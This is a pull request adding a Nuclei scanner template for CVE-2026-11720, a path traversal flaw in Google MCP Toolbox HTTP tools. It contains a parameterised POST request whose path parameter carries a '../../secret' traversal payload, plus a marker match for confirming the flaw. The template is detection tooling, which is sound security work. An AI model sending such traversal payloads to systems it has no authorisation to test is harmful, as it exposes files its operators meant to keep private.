### PR TITLE
Add CVE-2026-11720 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-11720.yaml
+++ b/http/cves/2026/CVE-2026-11720.yaml
@@ -1,0 +1,37 @@
+id: CVE-2026-11720
+
+info:
+  name: Google MCP Toolbox HTTP Tool Path Traversal
+  author: str4k3r
+  severity: critical
+  description: |
+    Detects MCP Toolbox HTTP tools that allow a path parameter to escape the
+    configured HTTP source base path and access an unintended downstream path.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-11720
+    - https://github.com/googleapis/mcp-toolbox/blob/v1.3.0/CHANGELOG.md
+  classification:
+    cve-id: CVE-2026-11720
+    cwe-id: CWE-22
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2026,mcp,toolbox,path-traversal
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/tool/{{tool_name}}/invoke"
+    headers:
+      Content-Type: application/json
+    body: '{"pathParam":"{{path_param}}"}'
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{marker}}'
+
+variables:
+  tool_name: "path-read"
+  path_param: "../../secret"
+  marker: "path-traversal-reached"


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-11720. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.